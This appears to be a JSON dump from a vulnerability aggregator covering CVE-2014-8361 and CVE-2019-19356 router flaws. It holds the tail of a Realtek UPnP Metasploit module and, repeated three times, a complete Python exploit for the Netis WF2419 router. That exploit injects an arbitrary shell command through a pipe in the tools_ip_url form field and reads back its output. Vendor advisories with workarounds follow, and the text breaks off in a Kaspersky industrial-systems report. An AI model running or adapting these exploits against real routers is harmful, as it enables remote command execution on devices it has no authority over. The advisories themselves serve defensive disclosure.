\nport_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\" \nport_mapping.elements['NewRemoteHost'].text = '' \nport_mapping.elements['NewProtocol'].text = 'TCP' \nport_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\" \n \nxml.to_s \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132090/realtek_miniigd_upnp_exec_noauth.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-02T22:58:24", "description": "", "cvss3": {}, "published": "2020-03-02T00:00:00", "type": "packetstorm", "title": "Netis WF2419 2.2.36123 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19356", "CVE-2019-1337"], "modified": "2020-03-02T00:00:00", "id": "PACKETSTORM:156588", "href": "https://packetstormsecurity.com/files/156588/Netis-WF2419-2.2.36123-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \n# Exploit Author: Elias Issa \n# Vendor Homepage: http://www.netis-systems.com \n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75 \n# Date: 2020-02-11 \n# Version: WF2419 V2.2.36123 => V2.2.36123 \n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123 \n# CVE : CVE-2019-19356 \n \n \n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\" \n \n#!/usr/bin/env python \nimport argparse \nimport requests \nimport json \n \ndef exploit(host,cmd): \n# Send Payload \nheaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \n'Content-Type': 'application/x-www-form-urlencoded'} \npost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\" \nvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\" \nreq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value) \nprint('[+] Payload sent') \ntry : \njson_data = 
json.loads(req_payload.text) \nif json_data[0] == \"SUCCESS\": \nprint('[+] Exploit Sucess') \n# Get Command Result \nprint('[+] Getting Command Output\\n') \nresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\" \npost_data = \"mode_name=netcore_get&no=no\" \nreq_result = requests.post(result_page, data=post_data, headers=headers_value) \njson_data = json.loads(req_result.text) \nresults = json_data[\"tools_results\"] \nprint results.replace(';', '\\n') \nelse: \nprint('[-] Exploit Failed') \nexcept: \nprint(\"[!] You might need to login.\") \n \n# To be implemented \ndef login(user, password): \nprint('To be implemented') \n \ndef main(): \nhost = args.host \ncmd = args.cmd \nuser = args.user \npassword = args.password \n#login(user,password) \nexploit(host,cmd) \n \nif __name__ == \"__main__\": \nap = argparse.ArgumentParser( \ndescription=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\") \nap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\") \nap.add_argument(\"cmd\", help=\"Command to run.\") \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\", \ndefault=\"admin\") \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\", \ndefault=\"admin\") \nargs = ap.parse_args() \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156588/netiswf2419-exec.txt", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-06-27T18:51:27", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response 
policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {}, "published": "2018-01-18T18:13:00", "type": "f5", "title": "miniigd SOAP service in Realtek SDK vulnerability CVE-2014-8361", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2018-01-18T18:13:00", "id": "F5:K57390658", "href": "https://support.f5.com/csp/article/K57390658", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2021-12-28T23:20:31", "description": "WSR-300HP provided by BUFFALO INC. is a wireless LAN router. 
WSR-300HP contains an arbitrary code execution vulnerability.\n\n ## Impact\n\nBy executing a specially crafted request prepared by a remote attacker, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Firmware** \nApply the firmware update according to the information provided by the developer.\n\n ## Products Affected\n\n * WSR-300HP firmware 2.30 and earlier\n", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "jvn", "title": "JVN#74871939: WSR-300HP vulnerable to arbitrary code execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2017-08-08T00:00:00", "id": "JVN:74871939", "href": "http://jvn.jp/en/jp/JVN74871939/index.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T23:20:11", "description": "Multiple Aterm products provided by NEC Corporation contain multiple vulnerabilities listed below. 
\n\n**Cross-site Scripting ([CWE-79](<https://cwe.mitre.org/data/definitions/79.html>))** \\- CVE-2021-20680 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N| **Base Score: 6.1** \nCVSS v2| AV:N/AC:M/Au:N/C:N/I:P/A:N| **Base Score: 4.3** \n \n**OS command injection via UPnP ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2014-8361 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H| **Base Score: 8.8** \nCVSS v2| AV:A/AC:L/Au:N/C:P/I:P/A:P| **Base Score: 5.8**\n\n ## Impact\n\n * An arbitrary script may be executed on the user's web browser - CVE-2021-20680\n * When UPnP is enabled, an attacker who can access the product may execute arbitrary OS commands - CVE-2014-8361\n\n ## Solution\n\n**Update the firmware** \n**For the users of WG1900HP2, WG1900HP, WG1800HP4, WG1200HS3, WG1200HS2, WG1200HP3, WG1200HP2, W1200EX, and W1200EX-MS:** \nUpdate the firmware to the latest version according to the information provided by the developer. \nAccording to the developer, the fixed firmware for WG1800HP3 will be released later. Until then, apply the following workarounds. \n \n**Apply workarounds** \n**For the users of WG1200HS, WG1200HP, WF800HP, WF300HP2, WR8165N, W500P, and W300P:** \nAccording to the developer, the update firmware for these products is not planned to be released. \nApplying the following workarounds may mitigate the impacts of the vulnerabilities. \n\n * Change the passwords of the web-based management utility and the Wi-Fi encryption key to stronger ones\n * CVE-2021-20680 \n * When accessing a website, use a URL obtained from a trusted source and bookmark it. 
For subsequent accesses, use the bookmarked URL.\n * Close the web browser after the operation is finished on the web-based management utility.\n * Delete the credential of the web-based management utility stored in the web browser.\n * CVE-2014-8361 \n * Disable UPnP.\n\n ## Products Affected\n\n * Aterm WG1900HP2 firmware Ver.1.3.1 and earlier\n * Aterm WG1900HP firmware Ver.2.5.1 and earlier\n * Aterm WG1800HP4 firmware Ver.1.3.1 and earlier\n * Aterm WG1800HP3 firmware Ver.1.5.1 and earlier\n * Aterm WG1200HS3 firmware Ver.1.1.2 and earlier - Only affected by CVE-2021-20680 issue\n * Aterm WG1200HS2 firmware Ver.2.5.0 and earlier\n * Aterm WG1200HP3 firmware Ver.1.3.1 and earlier\n * Aterm WG1200HP2 firmware Ver.2.5.0 and earlier\n * Aterm W1200EX firmware Ver.1.3.1 and earlier\n * Aterm W1200EX-MS firmware Ver.1.3.1 and earlier\n * Aterm WG1200HS firmware all versions\n * Aterm WG1200HP firmware all versions\n * Aterm WF800HP firmware all versions\n * Aterm WF300HP2 firmware all versions\n * Aterm WR8165N firmware all versions\n * Aterm W500P firmware all versions\n * Aterm W300P firmware all versions\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-04-09T00:00:00", "type": "jvn", "title": "JVN#67456944: Multiple vulnerabilities in multiple Aterm products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2021-20680"], "modified": "2021-04-09T00:00:00", "id": "JVN:67456944", "href": "http://jvn.jp/en/jp/JVN67456944/index.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T23:20:13", "description": "Multiple products provided by ELECOM CO.,LTD. contain multiple vulnerabilities listed below. \n\n**Improper Access Control ([CWE-284](<https://cwe.mitre.org/data/definitions/284.html>))** \\- CVE-2021-20643 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N| **Base Score: 5.3** \nCVSS v2| AV:N/AC:L/Au:N/C:N/I:P/A:N| **Base Score: 5.0** \n \n**Script injection in web setup page ([CWE-74](<https://cwe.mitre.org/data/definitions/74.html>))** \\- CVE-2021-20644 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N| **Base Score: 5.2** \nCVSS v2| AV:A/AC:L/Au:N/C:N/I:P/A:N| **Base Score: 3.3** \n \n**Stored cross-site scripting ([CWE-79](<https://cwe.mitre.org/data/definitions/79.html>))** \\- CVE-2021-20645 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N| **Base Score: 5.4** \nCVSS v2| AV:N/AC:M/Au:S/C:N/I:P/A:N| **Base Score: 3.5** \n \n**Cross-site request forgery ([CWE-352](<https://cwe.mitre.org/data/definitions/352.html>))** \\- CVE-2021-20646, CVE-2021-20647, CVE-2021-20650 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N| **Base Score: 4.3** \nCVSS v2| AV:N/AC:H/Au:N/C:N/I:P/A:N| **Base Score: 2.6** \n \n**OS command injection ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2021-20648 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H| **Base Score: 6.8** 
\nCVSS v2| AV:A/AC:L/Au:S/C:P/I:P/A:P| **Base Score: 5.2** \n \n**Improper server certificate verification ([CWE-295](<https://cwe.mitre.org/data/definitions/295.html>))** \\- CVE-2021-20649 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N| **Base Score: 4.8** \nCVSS v2| AV:N/AC:H/Au:N/C:P/I:P/A:N| **Base Score: 4.0** \n \n**OS command injection via UPnP ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2014-8361 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H| **Base Score: 8.8** \nCVSS v2| AV:A/AC:L/Au:N/C:P/I:P/A:P| **Base Score: 5.0**\n\n ## Impact\n\n * By processing a specially crafted request, administrative password of the product may be changed - CVE-2021-20643\n * By displaying a specially crafted SSID on the web setup page, arbitrary script may be executed on the user's web browser - CVE-2021-20644\n * An arbitrary script may be executed on a logged in user's web browser - CVE-2021-20645\n * If a user views a malicious page while logged in to the web setup page of the product, arbitrary request may be executed and as a result, the product's settings may be altered and/or telnet daemon may be started - CVE-2021-20646, CVE-2021-20647, CVE-2021-20650\n * An attacker who can access the product may execute arbitrary OS commands - CVE-2021-20648\n * A man-in-the-middle attack may allow an attacker to alter the communication response and as a result, arbitrary OS commands may be executed on the product - CVE-2021-20649\n * When UPnP is enabled, an attacker who can access the product may execute arbitrary OS commands - CVE-2014-8361\n\n ## Solution\n\n**Stop using the products** \nThe developer states these vulnerable products are no longer supported, therefore stop using the products. \n \nAlso according to the developer, the following workarounds may mitigate some of the effects of these issues. 
\n**Apply a Workaround** \n**CVE-2021-20645, CVE-2021-20646, CVE-2021-20647, CVE-2021-20648, CVE-2021-20650**\n\n * Change web setup page's log in password.\n * Do not access other websites while logged in to the web setup page.\n * Close the web browser after the operation is finished on the web setup page.\n * Delete password of web setup page stored in web browser.\n**CVE-2021-20649**\n\n * Do not execute the firmware's \"Check for update files\" function.\n * For detailed setting change process, refer to [User's Manual](<https://www.elecom.co.jp/support/manual/network/wireless-lan/router/wrc-300febk-s/wrc-300febk-s_users_manual_v2.pdf>) for the products.\n**CVE-2014-8361**\n\n * Disable UPnP.\n\n ## Products Affected\n\n**CVE-2021-20643**\n\n * LD-PS/U1\n**CVE-2021-20644**\n\n * WRC-1467GHBK-A\n**CVE-2021-20645, CVE-2021-20646**\n\n * WRC-300FEBK-A\n**CVE-2021-20647, CVE-2021-20648, CVE-2021-20649**\n\n * WRC-300FEBK-S\n**CVE-2021-20650**\n\n * NCC-EWF100RMWH2\n**CVE-2014-8361**\n\n * WRC-300FEBK\n * WRC-F300NF\n * WRC-300FEBK-S\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-01-26T00:00:00", "type": "jvn", "title": "JVN#47580234: Multiple vulnerabilities in multiple ELECOM products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2021-20643", "CVE-2021-20644", "CVE-2021-20645", "CVE-2021-20646", "CVE-2021-20647", "CVE-2021-20648", "CVE-2021-20649", "CVE-2021-20650"], "modified": "2021-01-26T00:00:00", "id": "JVN:47580234", "href": "http://jvn.jp/en/jp/JVN47580234/index.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:26", "description": "\nNetis WF2419 2.2.36123 - Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-02T00:00:00", "title": "Netis WF2419 2.2.36123 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356", "CVE-2019-1337"], "modified": "2020-03-02T00:00:00", "id": "EXPLOITPACK:EC837ED1EA41395DFCD50B526170B177", "href": "", "sourceData": "# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \n# Exploit Author: Elias Issa\n# Vendor Homepage: http://www.netis-systems.com\n# Software Link: 
http://www.netis-systems.com/Suppory/downloads/dd/1/img/75\n# Date: 2020-02-11\n# Version: WF2419 V2.2.36123 => V2.2.36123\n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123\n# CVE : CVE-2019-19356\n\n\n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\"\n\n#!/usr/bin/env python\nimport argparse\nimport requests\nimport json\n\ndef exploit(host,cmd):\n\t# Send Payload\n\theaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \n\t\t\t'Content-Type': 'application/x-www-form-urlencoded'}\n\tpost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\"\n\tvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\"\n\treq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)\n\tprint('[+] Payload sent')\n\ttry :\n\t\tjson_data = json.loads(req_payload.text)\n\t\tif json_data[0] == \"SUCCESS\":\n\t\t\tprint('[+] Exploit Sucess')\n\t\t\t# Get Command Result\n\t\t\tprint('[+] Getting Command Output\\n')\n\t\t\tresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\"\n\t\t\tpost_data = \"mode_name=netcore_get&no=no\" \n\t\t\treq_result = requests.post(result_page, data=post_data, headers=headers_value)\n\t\t\tjson_data = json.loads(req_result.text)\n\t\t\tresults = json_data[\"tools_results\"]\n\t\t\tprint results.replace(';', '\\n')\n\t\telse:\n\t\t\tprint('[-] Exploit Failed')\n\texcept:\n \t\tprint(\"[!] 
You might need to login.\") \n\n# To be implemented\ndef login(user, password):\n\tprint('To be implemented')\n\ndef main():\n host = args.host\n cmd = args.cmd\n user = args.user\n password = args.password\n #login(user,password)\n exploit(host,cmd)\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser(\n description=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\")\n ap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\")\n ap.add_argument(\"cmd\", help=\"Command to run.\")\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\",\n default=\"admin\")\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\",\n default=\"admin\")\n args = ap.parse_args()\n main()", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:35", "description": "", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-02T00:00:00", "type": "exploitdb", "title": "Netis WF2419 2.2.36123 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2019-1337", "CVE-2019-19356"], "modified": "2020-03-02T00:00:00", "id": "EDB-ID:48149", "href": "https://www.exploit-db.com/exploits/48149", "sourceData": "# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \r\n# Exploit Author: Elias Issa\r\n# Vendor Homepage: http://www.netis-systems.com\r\n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75\r\n# Date: 2020-02-11\r\n# Version: WF2419 V2.2.36123 => V2.2.36123\r\n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123\r\n# CVE : CVE-2019-19356\r\n\r\n\r\n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\"\r\n\r\n#!/usr/bin/env python\r\nimport argparse\r\nimport requests\r\nimport json\r\n\r\ndef exploit(host,cmd):\r\n\t# Send Payload\r\n\theaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \r\n\t\t\t'Content-Type': 'application/x-www-form-urlencoded'}\r\n\tpost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\"\r\n\tvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\"\r\n\treq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)\r\n\tprint('[+] Payload sent')\r\n\ttry :\r\n\t\tjson_data = json.loads(req_payload.text)\r\n\t\tif json_data[0] == \"SUCCESS\":\r\n\t\t\tprint('[+] Exploit Sucess')\r\n\t\t\t# Get Command Result\r\n\t\t\tprint('[+] Getting Command Output\\n')\r\n\t\t\tresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\"\r\n\t\t\tpost_data = \"mode_name=netcore_get&no=no\" \r\n\t\t\treq_result = requests.post(result_page, data=post_data, headers=headers_value)\r\n\t\t\tjson_data = json.loads(req_result.text)\r\n\t\t\tresults = json_data[\"tools_results\"]\r\n\t\t\tprint results.replace(';', '\\n')\r\n\t\telse:\r\n\t\t\tprint('[-] Exploit Failed')\r\n\texcept:\r\n \t\tprint(\"[!] 
You might need to login.\") \r\n\r\n# To be implemented\r\ndef login(user, password):\r\n\tprint('To be implemented')\r\n\r\ndef main():\r\n host = args.host\r\n cmd = args.cmd\r\n user = args.user\r\n password = args.password\r\n #login(user,password)\r\n exploit(host,cmd)\r\n\r\nif __name__ == \"__main__\":\r\n ap = argparse.ArgumentParser(\r\n description=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\")\r\n ap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\")\r\n ap.add_argument(\"cmd\", help=\"Command to run.\")\r\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\",\r\n default=\"admin\")\r\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\",\r\n default=\"admin\")\r\n args = ap.parse_args()\r\n main()", "sourceHref": "https://www.exploit-db.com/download/48149", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2018-03-30T15:53:03", "description": "\n\n_For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems \u2013 those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (_[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the second half of 2017. 
_\n\n_The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security._\n\n## Overview of ICS vulnerabilities identified in 2017\n\n_The analysis of vulnerabilities was performed based on vendor advisories, publicly available information from open vulnerability databases (ICS-CERT, CVE, Siemens Product CERT), as well as the results of Kaspersky Lab ICS CERT's own research. Vulnerability data published on the _[_ICS-CERT_](<https://ics-cert.us-cert.gov/>)_ website in 2017 was used to create statistical diagrams._\n\n### Vulnerabilities in various ICS components\n\n#### Number of vulnerabilities identified\n\nIn 2017, the total number of vulnerabilities identified in different ICS components and published on the [ICS-CERT](<https://ics-cert.us-cert.gov/>) website was 322. This includes vulnerabilities identified in general-purpose software and in network protocols that are also relevant to industrial software and equipment. 
These vulnerabilities are discussed in this report separately.\n\n#### Analysis by Industry\n\nThe largest number of vulnerabilities affect industrial control systems in the energy sector (178), manufacturing processes at various enterprises (164), water supply (97) and transportation (74).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130415/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-1.png>)\n\n_Number of vulnerable products used in different industries \n(according to [ICS-CERT](<https://ics-cert.us-cert.gov/>) classification) \nvulnerabilities published in 2017_\n\n#### Severity levels of the vulnerabilities identified\n\nMore than half (194) of the vulnerabilities identified in ICS systems were assigned [CVSS v.3.0](<https://www.first.org/cvss>) base scores of 7 or higher, corresponding to a high or critical level of risk.\n\n_Table 1 \u2013 Distribution of published vulnerabilities by risk level_\n\n| **Severity score** | 9 to 10 (critical) | 7 to 8.9 (high) | 4 to 6.9 (medium) | 0 to 3.9 (low) \n---|---|---|---|--- \n**Number of vulnerabilities** | 60 | 134 | 127 | 1 \n \nThe highest severity score of 10 was assigned to vulnerabilities identified in the following products:\n\n * [iniNet Solutions GmbH SCADA Webserver](<https://ics-cert.us-cert.gov/advisories/ICSA-17-264-04>),\n * [Westermo MRD-305-DIN, MRD-315, MRD-355, and MRD-455](<https://ics-cert.us-cert.gov/advisories/ICSA-17-236-01>),\n * [Hikvision Cameras](<https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01>),\n * [Sierra Wireless AirLink Raven XE and XT](<https://ics-cert.us-cert.gov/advisories/ICSA-17-115-02>),\n * [Schneider Electric Modicon M221 PLCs and SoMachine Basic](<https://ics-cert.us-cert.gov/advisories/ICSA-17-103-02A>),\n * [BINOM3 Electric Power Quality Meter](<https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01A>),\n * [Carlo Gavazzi VMU-C EM and VMU-C PV](<https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03>).\n\nAll 
vulnerabilities that were assigned the severity rating of 10 have much in common: they have to do with authentication issues, can be exploited remotely and are easy to exploit.\n\nIn addition, the highest severity rating was assigned to a vulnerability in the [Modicon Modbus Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>), which is discussed below.\n\nIt should be noted that the CVSS base score does not account for the aspects of security that are specific to industrial automation systems or for the distinctive characteristics of each organization's industrial processes. This is why, when assessing the severity of a vulnerability, we recommend keeping in mind, in addition to the CVSS score, the possible consequences of its exploitation, such as the non-availability or limited availability of ICS functionality that affects the continuity of the industrial process.\n\n#### Types of vulnerabilities identified\n\nThe most common types of vulnerabilities include buffer overflow (Stack-Based Buffer Overflow, Heap-Based Buffer Overflow) and improper authentication (Improper Authentication).\n\nAt the same time, 23% of all vulnerabilities identified are web-related (Injection, Path Traversal, Cross-Site Request Forgery (CSRF), Cross-Site Scripting) and 21% are associated with authentication issues (Improper Authentication, Authentication Bypass, Missing Authentication for Critical Function) and with access control problems (Access Control, Incorrect Default Permissions, Improper Privilege Management, Credentials Management).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130422/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-2.png>)\n\n_Most common vulnerability types_\n\nExploitation of vulnerabilities in various ICS components by attackers can lead to arbitrary code execution, unauthorized control of industrial 